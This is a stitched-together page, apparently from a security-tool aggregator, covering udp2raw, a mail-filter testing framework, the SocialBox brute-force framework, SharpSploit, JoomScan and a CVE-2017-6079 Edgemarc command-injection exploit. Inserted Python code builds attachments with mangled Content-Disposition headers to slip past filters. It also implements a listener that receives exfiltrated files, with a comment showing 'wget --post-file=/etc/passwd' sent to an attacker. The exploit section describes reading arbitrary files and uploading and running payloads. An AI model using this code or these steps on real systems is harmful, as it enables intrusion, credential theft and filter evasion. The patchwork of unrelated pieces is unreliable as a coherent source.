Monitor iptables and automatically re-add the iptables rules (for blocking kernel TCP processing) if necessary. Especially useful when iptables rules may be cleared by other programs (for example, if you are using OpenWrt, every time you change and commit a setting, the iptables rules may be cleared and re-constructed).

--conf-file

You can also load options from a configuration file in order to keep secrets away from the ps command.

For example, rewrite the options for the server example above (in the Getting Started section) into a configuration file:

server.conf

-s
# You can add comments like this
# Comments MUST occupy an entire line
# Or they will not work as expected
# Listen address
-l 0.0.0.0:4096
# Remote address
-r 127.0.0.1:7777
-a
-k passwd
--raw-mode faketcp

Pay attention to the -k parameter: in command-line mode the quotes around the password are removed by the shell, whereas in configuration files quotes are not removed.

Then start the server with

./udp2raw_amd64 --conf-file server.conf

--fifo

Use a fifo (named pipe) for sending commands to the running program, for example --fifo fifo.file.

At the client side, you can use echo reconnect >fifo.file to force the client to reconnect. Currently no command has been implemented for the server.

Performance Test

Test method:

iperf3 TCP via OpenVPN + udp2raw (iperf3 UDP mode is not used because of a bug mentioned in this issue: https://github.com/esnet/iperf/issues/296). Instead, we package the TCP traffic into UDP by OpenVPN to test the performance. Read Application for details.

iperf3 command:

iperf3 -c 10.222.2.1 -P40 
iperf3 -c 10.222.2.1 -P40 -R

Environments

  • Client: Vultr $2.5/month plan (single core 2.4GHz CPU, 512MB RAM, Tokyo, Japan)
  • Server: BandwagonHost $3.99/year plan (single core 2.0GHz CPU, 128MB RAM, Los Angeles, USA)

Test1

raw_mode: faketcp cipher_mode: xor  auth_mode: simple

(reverse speed was similar and not uploaded)

Test2

raw_mode: faketcp cipher_mode: aes128cbc  auth_mode: md5

(reverse speed was similar and not uploaded)

Application

Tunneling any traffic via raw traffic by using udp2raw + OpenVPN

  1. Bypasses UDP block/UDP QoS
  2. No TCP over TCP problem (on the TCP over TCP problem, see http://sites.inka.de/bigred/devel/tcp-tcp.html and https://community.openvpn.net/openvpn/ticket/2)
  3. OpenVPN over ICMP also becomes a choice
  4. Supports almost any UDP-based VPN

Mail Security Testing – Framework For Mail Security & Filtering Solutions

Mail Security Testing Framework is a testing framework for mail security and filtering solutions.

Mail Security Testing Installation

The mail security testing framework works with Python >=3.5. Just pull this repository and go ahead. No further dependencies are required.

Usage

The script mail-tester.py runs the tests. Read the help message with ./mail-tester.py --help and check the list of test and evasion modules with ./mail-tester.py -l to get an overview about the capabilities and the usage of the script. Some hints:

  • At least the parameters --smtp-server and --to should be given for a minimal test run.
  • All parameters can also be stored in configuration files without the prefix --. These configuration files can be used by invoking ./mail-tester.py @tester.conf (configuration contained in tester.conf).
  • Multiple recipients can be configured with --to for testing of different filter configurations.
  • Some mail filtering solutions may reject messages after a while. Use --auto-delay for automatic throttling of the mails. This can be fine-tuned with --delay-step, --delay-max and --delay.
  • Some tests (Spam and Malware) require samples. Put these in directories and configure these directories with the --spam-folder and --malware-folder parameters. The samples are not included in this repository (and will not be). Good places to get malware are theZoo, Das Malwerk or other collections. Spam can be exported straight from your Spam folder, but must be in EML format.
  • Blacklists can be supplied with the --blacklist parameter and are used as sender addresses.
  • The Shellshock and subject XSS test cases should have a valid backconnect domain, where you are able to see any backconnects (especially DNS requests). The free Canary Tokens service can be used for this purpose. Thanks to Thinkst for providing this awesome service!
  • Some neat attachment recognition evasion tricks can be enabled with --evasion content-disposition. These were used in the past to confuse AV/sandboxing solutions so that they let malicious mails through.
  • Don’t forget to log the test results with --log. Mail filtering providers often reject mails in the SMTP dialog, which is reflected in the generated log.
  • Test cases can be dumped with --output as plain files in a directory, in MBox (--mbox) or MailDir (--maildir) format. This is useful to test mail user agents without sending any mails, to document or review generated test cases.

Development & Extension For Mail Security Testing

Tests

Your own tests can be implemented as a class in one of the existing, or a newly created, Python files in the tests/ directory. The class must be a subclass of MailTestBase, located in the module tests.base of this project. Newly implemented tests are discovered automatically when the class variable active is set to True. Furthermore (if you plan to contribute tests back to the main repository), the class variables identifier, name and description should be set appropriately.

The following base classes exist with methods or class variables intended for overriding:

  • MailTestBase: Test class for generic tests.
    • generateTestCases(): Yields test messages. These should be generated with the MIME* classes from the Python email.mime.* packages or with the Message class from email.message to ensure valid mail messages.
    • active: Boolean value if test should be active.
    • identifier: Short identifier of the test. This one is used to enable or disable tests in parameters.
    • name: Short test title.
    • description: Longer test description, should fit within approximately 100 characters.
    • delivery_sender and delivery_recipient: Boolean values, False by default. Normally, the sender and recipients are set in the message and the Python SMTP module takes them over from there. Sometimes it is desirable to set them explicitly in the SMTP library, which can be configured by setting these values to True.
    • finalizeMessage(msg): By default, the base test class sets the From and To headers accordingly. This behaviour can be overridden if required for the test case.
  • MailAttachmentTestBase: Test class for attachment test cases. This generates a complete valid mail with a Subject and a text part and attaches the test case to it. Derived from MailTestBase, therefore the methods/variables from it can be overridden here, too.
    • generateAttachments(): Yields test cases as (description, attachment) tuples.
    • subject: Sets the subject. The placeholder {} is replaced by the description yielded by generateAttachments().
    • generateTestCases(): is already overridden with an implementation of the message generation described above, but may be further adapted if required.

Setting the subjects of generated messages is highly recommended in order to recognize the tests in the receiving inbox.

Evasions

Evasion classes implement techniques for evading recognition of particular mail properties by mail security solutions. Currently, one evasion technique is implemented: it tries to hide attachments from such solutions by means of intentionally broken Content-Disposition headers.

Implement New Evasions

Evasions are implemented by a factory class pattern. The DeliveryBase class instantiates a factory class derived from the BaseEvasionFactory class. The factory constructor receives a flag that indicates whether the evasion is activated. The evasion factory instance is then passed to the test class and stored in its evasions attribute, which contains a dict with the evasion identifiers as keys. Inside the test, an evasion class (based on EvasionBase) is instantiated with getEvasionGenerator(). The constructor parameters are defined individually per evasion technique.

The following base classes are used to implement evasions:

  • BaseEvasionFactory: Evasion factories must be based on this class. Usually, only the following class variables should be set:
    • active: Set to True if the evasion should be active.
    • identifier: Short identifier of the evasion module used for enabling it in the test configuration.
    • name: Short title of the evasion technique.
    • description: Longer description of the evasion technique. Should fit in approximately 100 characters.
    • generator_evasion: Evasion class that is instantiated if the evasion is enabled.
    • generator_default: Evasion class that is instantiated if the evasion is disabled.
  • BaseEvasion: Implementations of evasions must be subclasses of this base class. The following methods must be overridden:
    • __init__(): Should instantiate the class with the base message or attachment that should be manipulated with evasion techniques.
    • generate(): Apply the evasion technique to the object passed to the constructor and yield it to the caller as (description, object with evasion applied) tuple.

Generally, the evasion class should yield all evasion variants and pass the default through as a dedicated test case, while the default evasion classes only pass on the given object or create the required data structures, like headers.

Using Evasion Techniques in Test Cases

Evasion techniques are used in test cases where they are applicable. E.g. if an evasion technique manipulates the header of a mail or attachment, the following steps have to be implemented:

  1. Generate the base object (mail or attachment) without consideration of the evasion.
  2. Instantiate the appropriate evasion class by utilization of the evasion factory instance from self.evasions, e.g.: evasion_items = self.evasions["evasion_identifier"].getEvasionGenerator(message)
  3. Iterate over the generator and yield the test cases:
     for evasion_item in evasion_items:
         yield evasion_item

Usage of the Content Disposition Evasion Technique

The content disposition evasion technique is already implemented in the framework and should be used for all test cases that target the recognition of malicious attachments. The constructor receives an attachment and the intended file name. The evasion class then yields (evasion name, attachment with applied evasion technique) tuples that can be yielded directly by the test's generateAttachments() method.
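To make the Tests, Evasions and "Using Evasion Techniques in Test Cases" sections above concrete, here is an added stand-alone Python sketch of the pattern. It is not code from the framework: it does not import tests.base or the evasion modules, the class names only mirror the README's, and the Content-Disposition variants, the sample payload and the mail addresses are this example's own assumptions.

```python
# Added example: stand-alone sketch of the README's test/evasion pattern. Class
# names mirror the README; bodies, evasion variants and sample data are my own.
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

SAMPLE_PAYLOAD = b"MZ-not-a-real-executable"   # constructed stand-in for a sample
SENDER = "tester@example.test"                 # assumed addresses, not from the page
RECIPIENT = "filter-check@example.test"


class BaseEvasion:
    """Wraps the payload to manipulate; generate() yields (description, part)."""
    def __init__(self, payload, filename):
        self.payload, self.filename = payload, filename

    def _fresh_part(self):  # new part per variant so header tweaks never leak
        return MIMEApplication(self.payload, "octet-stream")

    def generate(self):
        raise NotImplementedError


class DefaultDisposition(BaseEvasion):
    """Evasion disabled: a single well-formed attachment."""
    def generate(self):
        part = self._fresh_part()
        part.add_header("Content-Disposition", "attachment", filename=self.filename)
        yield "plain", part


class BrokenDisposition(BaseEvasion):
    """Evasion enabled: illustrative Content-Disposition manglings (my own list).
    Each keeps the payload intact but weakens the header that filters key on."""
    def generate(self):
        # Pass the default through as its own test case, as the README advises.
        yield from DefaultDisposition(self.payload, self.filename).generate()

        part = self._fresh_part()  # filename only in the Content-Type name= parameter
        part.set_param("name", self.filename)
        part.add_header("Content-Disposition", "attachment")
        yield "name-in-content-type-only", part

        part = self._fresh_part()  # empty filename value
        part["Content-Disposition"] = 'attachment; filename=""'
        yield "empty-filename", part

        part = self._fresh_part()  # RFC 2231 encoded filename*= parameter
        part.add_header("Content-Disposition", "attachment",
                        filename=("utf-8", "", self.filename))
        yield "rfc2231-filename", part

        part = self._fresh_part()  # two headers; a naive parser sees only "inline"
        part.add_header("Content-Disposition", "inline")
        part.add_header("Content-Disposition", "attachment", filename=self.filename)
        yield "duplicate-disposition", part


class ContentDispositionEvasionFactory:
    """Factory role from the README: the active flag selects the evasion class."""
    identifier = "content-disposition"
    generator_evasion, generator_default = BrokenDisposition, DefaultDisposition

    def __init__(self, active):
        self.active = active

    def getEvasionGenerator(self, *args):
        cls = self.generator_evasion if self.active else self.generator_default
        return cls(*args).generate()


class ExecutableAttachmentTest:
    """MailAttachmentTestBase-style test: each variant becomes a complete mail."""
    active, identifier = True, "exe-attachment"
    subject = "[mail-tester] exe attachment: {}"

    def __init__(self, evasions):
        self.evasions = evasions  # dict keyed by evasion identifier

    def generateAttachments(self):
        factory = self.evasions["content-disposition"]
        yield from factory.getEvasionGenerator(SAMPLE_PAYLOAD, "invoice.exe")

    def generateTestCases(self):
        for description, attachment in self.generateAttachments():
            msg = MIMEMultipart()
            msg["Subject"] = self.subject.format(description)
            msg["From"], msg["To"] = SENDER, RECIPIENT
            msg.attach(MIMEText("Attachment recognition test case.\n"))
            msg.attach(attachment)
            yield msg


def build_test_cases(evasion_active):
    """Wire factory and test together as the README describes; return the mails."""
    evasions = {"content-disposition": ContentDispositionEvasionFactory(evasion_active)}
    return list(ExecutableAttachmentTest(evasions).generateTestCases())


def attachment_of(msg):
    """The part a filter must recognise: second part of the multipart/mixed body."""
    return msg.get_payload()[1]


if __name__ == "__main__":
    for case in build_test_cases(True):
        print(case["Subject"], "->", attachment_of(case).get_all("Content-Disposition"))
```

With the evasion disabled the test yields one plain message; with it enabled the same test yields the plain case plus four header variants, each tagged in the Subject so the result can be matched in the receiving inbox. Note that Python's own get_filename() still recovers "invoice.exe" for the RFC 2231 and name=-only variants but returns None for the duplicate-header case, which is exactly the kind of parser disagreement these tricks exploit.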

Disclaimer

Don’t do anything evil with this! Tests of cloud or otherwise hosted solutions should always be approved by the tested provider. Only use your own test accounts and don’t annoy anyone with a load of test mails.

SocialBox – A Bruteforce Attack Framework[ Facebook , Gmail , Instagram ,Twitter]

SocialBox is a Bruteforce Attack Framework [ Facebook , Gmail , Instagram ,Twitter ].

SocialBox Installation

sudo apt-get install git
sudo git clone https://github.com/TunisianEagles/SocialBox.git
cd SocialBox
chmod +x SocialBox.sh
chmod +x install-sb.sh
./install-sb.sh
./SocialBox.sh

Tested On

  • Backbox linux
  • Ubuntu
  • Kali linux

Credit: Belahsan Ouerghi

SharpSploit – A .NET Post-Exploitation Library Written in C#

SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.

It is named, in part, as a homage to the PowerSploit project, a personal favorite of mine! While SharpSploit does port over some functionality from PowerSploit, my intention is not at all to create a direct port of PowerSploit. It will be its own project, albeit with similar goals to PowerSploit.

SharpSploit Appeal of C#

There seems to be a trend developing on the offensive side of the security community in porting existing PowerShell toolsets to C#, and SharpSploit is another piece of that puzzle. With the added security features in PowerShell (i.e. ScriptBlock Logging, AMSI, etc.), it makes sense that red teamers are investing in other options. C# is the logical next step from PowerShell, seeing that both are based on the .NET framework and porting toolsets from PowerShell to C# is fairly easy to do.

However, C# does not come without its own set of issues from an offensive perspective. It certainly seems as if optics into .NET are on the way, and from an operator usability perspective we lose quite a bit of flexibility moving from a scripting language like PowerShell to a compiled language like C#.

We also need to start worrying about .NET versions. You’ll find .NET v3.5 on a majority of Windows OS versions by default, but newer Windows 10 and Server 2016 systems will only have .NET v4.0+ installed by default. Another “gotcha” is that .NET is not enabled by default on all Windows OS versions either; you’ll find that it needs to be explicitly enabled on Windows Server 2008 and earlier server OS versions. SharpSploit attempts to deal with this by targeting both .NET v3.5 and v4.0 to get the most coverage possible, but you’ll need to be careful to use the correct version on the correct system.

SharpSploit Console or Not to Console?

The most significant difference you will see between SharpSploit and most other offensive C# libraries that have been released so far, is that there is no SharpSploit.exe! SharpSploit is designed as a library, so there is only a SharpSploit.dll.

My intention is for SharpSploit to be primarily used as a library for operators to reference in their own toolsets. However, I anticipate some limitations from this implementation that will likely force me to add a console-based interface eventually. For instance, Cobalt Strike’s execute-assembly module expects an application to have an EntryPoint (i.e. “main” function) to execute, so SharpSploit currently does not operate easily with Cobalt Strike. This is a great example of some of the flexibility issues with offensive C# we will have to solve in the transition from PowerShell.

Try not to worry about this too much for now, you’ll see some other creative methods for SharpSploit execution from me here in the near future 🙂 And I will likely add a follow-up post at some point on convenient methods for executing SharpSploit functions.

Joomscan – OWASP Joomla Vulnerability Scanner Project

OWASP Joomla! Vulnerability Scanner or JoomScan is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments.

Implemented in Perl, this tool enables seamless and effortless scanning of Joomla installations, while leaving a minimal footprint with its lightweight and modular architecture. It not only detects known vulnerabilities, but is also able to detect many misconfigurations and admin-level shortcomings that can be exploited by adversaries to compromise the system.

Furthermore, it provides a user-friendly interface and compiles the final reports in both text and HTML formats for ease of use and minimization of reporting overheads. It is included in Kali Linux distributions.

Installation

git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl

ARGUMENTS

Usage:	joomscan.pl [options]

--url | -u <URL>                |   The Joomla URL/domain to scan.
--enumerate-components | -ec    |   Try to enumerate components.

--cookie <String>               |   Set cookie.
--user-agent | -a <user-agent>  |   Use the specified User-Agent.
--random-agent | -r             |   Use a random User-Agent.
--timeout <time-out>            |   set timeout.
--about                         |   About Author
--update                        |   Update to the latest version.
--help | -h                     |   This help screen.
--version                       |   Output the current version and exit.

JOOMSCAN USAGE EXAMPLES

Do default checks…
perl joomscan.pl --url www.example.com
or
perl joomscan.pl -u www.example.com

Enumerate installed components…
perl joomscan.pl --url www.example.com --enumerate-components
or
perl joomscan.pl -u www.example.com --ec

Set cookie
perl joomscan.pl --url www.example.com --cookie "test=demo;"

Set user-agent
perl joomscan.pl --url www.example.com --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
or
perl joomscan.pl -u www.example.com -a "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"

Set random user-agent
perl joomscan.pl -u www.example.com --random-agent
or
perl joomscan.pl --url www.example.com -r

Set proxy
perl joomscan.pl --url www.example.com --proxy http://127.0.0.1:8080
or
perl joomscan.pl -u www.example.com --proxy https://127.0.0.1:443

Update Joomscan…
perl joomscan.pl --update

Exploit CVE-2017-6079 – Blind Command Injection In Edgewater Edgemarc Devices Exploit

This exploit was developed based on the technical description by depthsecurity

https://depthsecurity.com/blog/cve-2017-6079-blind-command-injection-in-edgewater-edgemarc-devices

The HTTP web-management application on Edgewater Networks Edgemarc appliances has a hidden page that allows user-defined commands, such as specific iptables routes, to be set. This page can essentially be used as a blind web shell: the web application returns no feedback to the client, but if the command is valid, it executes. An example is the wget command. The page that allows this has been confirmed in firmware as old as 2006.

Nmap will identify the device from its web server as shown

Usage

 _____    _                          _
| ____|__| | __ _  _____      ____ _| |_ ___ _ __
|  _| / _` |/ _` |/ _ \ \ /\ / / _` | __/ _ \ '__|
| |__| (_| | (_| |  __/\ V  V / (_| | ||  __/ |
|_____\__,_|\__, |\___| \_/\_/ \__,_|\__\___|_|
            |___/
 _____    _
| ____|__| | __ _  ___ _ __ ___   __ _ _ __ ___
|  _| / _` |/ _` |/ _ \ '_ ` _ \ / _` | '__/ __|
| |__| (_| | (_| |  __/ | | | | | (_| | | | (__
|_____\__,_|\__, |\___|_| |_| |_|\__,_|_|  \___|
            |___/
 _____            _       _ _
| ____|_  ___ __ | | ___ (_) |_
|  _| \ \/ / '_ \| |/ _ \| | __|
| |___ >  <| |_) | | (_) | | |_
|_____/_/\_\ .__/|_|\___/|_|\__|
           |_|


                 Edgewater Edgemarc Exploit CVE-2017-6079
                 Coded By: Mostafa Soliman
                 
    [USAGE] CVE-2017-6079.py [operation] [TargetIP] [AttackerIP] [FilePath]
    operation: Either read / upload
    AttackerIP: IP address to receive the connection on
    TargetIP: IP address of the target running Edgewater Edgemarc server
    FilePath:  Remote file to download in case of "read" operation
               Local file to upload in case of "upload" operation

Exploit

The exploit assumes that the device still has the default root password. If this is not the case, you will need to replace the Authorization header value in the script. The exploit has two modes of operation:

Read

This mode allows the attacker to read any file on the vulnerable device.

Upload

This mode allows the attacker to upload an ELF payload to the /tmp/ folder and execute it. You will need to start a listener to receive the connection.
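Both modes depend on the same fact the description stresses: the injected command runs but the web application returns nothing, so proof of execution and any read-back data have to arrive out of band on the AttackerIP side. The following is an added, generic Python catch-all HTTP receiver for that side of a blind injection. It is not part of the CVE-2017-6079 script and assumes nothing device-specific beyond what the text states (a command such as wget runs on the target); the marker scheme, the localhost stand-in for the target's wget and the port in the main block are this example's own choices.

```python
# Added example: a catch-all HTTP receiver for the out-of-band side of a blind
# injection. Not part of the CVE-2017-6079 script; nothing device-specific is
# assumed beyond what the text states (a command such as wget runs on the target
# and the web application returns no output to the client).
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


class CallbackRecorder(BaseHTTPRequestHandler):
    """Accepts any GET/POST/PUT and records it; one record is proof of execution."""
    records = []  # shared by all handler instances, read back by the caller

    def _record(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length) if length else b""
        CallbackRecorder.records.append({
            "peer": self.client_address[0],
            "method": self.command,
            "path": self.path,
            "user_agent": self.headers.get("User-Agent", ""),
            "body": body,
        })
        # Always answer 200 so a chained command on the target does not fail on a 4xx.
        self.send_response(200)
        self.send_header("Content-Length", "2")
        self.end_headers()
        self.wfile.write(b"ok")

    do_GET = do_POST = do_PUT = _record

    def log_message(self, fmt, *args):  # keep stdout quiet; the records are the log
        pass


def start_listener(host="127.0.0.1", port=0):
    """Serve on a daemon thread; returns (server, bound_port). port=0 picks a free one."""
    server = ThreadingHTTPServer((host, port), CallbackRecorder)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def callbacks_for(marker):
    """Records whose path carries the per-probe marker. An injected
    `wget http://ATTACKER:PORT/<marker>` that shows up here proves the command
    ran even though the web application itself returned nothing."""
    return [r for r in CallbackRecorder.records if marker in r["path"]]


def exfiltrated_bodies(marker):
    """Bodies POSTed to a marked path, e.g. by GNU wget --post-file=/etc/passwd;
    this is the read-back channel a 'read' primitive needs."""
    return [r["body"] for r in callbacks_for(marker) if r["body"]]


def simulate_callback(port, path, body=None):
    """Constructed stand-in for the target's wget: hit the listener from localhost."""
    req = urllib.request.Request(f"http://127.0.0.1:{port}{path}", data=body,
                                 method="POST" if body is not None else "GET")
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.status


if __name__ == "__main__":
    server, port = start_listener("0.0.0.0", 8080)  # assumed port, adjust as needed
    print(f"listening on :{port}; inject e.g. wget http://<your-ip>:{port}/probe-1")
    threading.Event().wait()  # run until interrupted
```

Use a fresh random marker per probe so a stray scanner hitting the port cannot be mistaken for a successful injection, and record the peer address to tie the callback to the target. If the device's egress HTTP is filtered, a DNS-based callback (for instance the Canary Tokens service mentioned earlier on this page) is the more reliable confirmation channel.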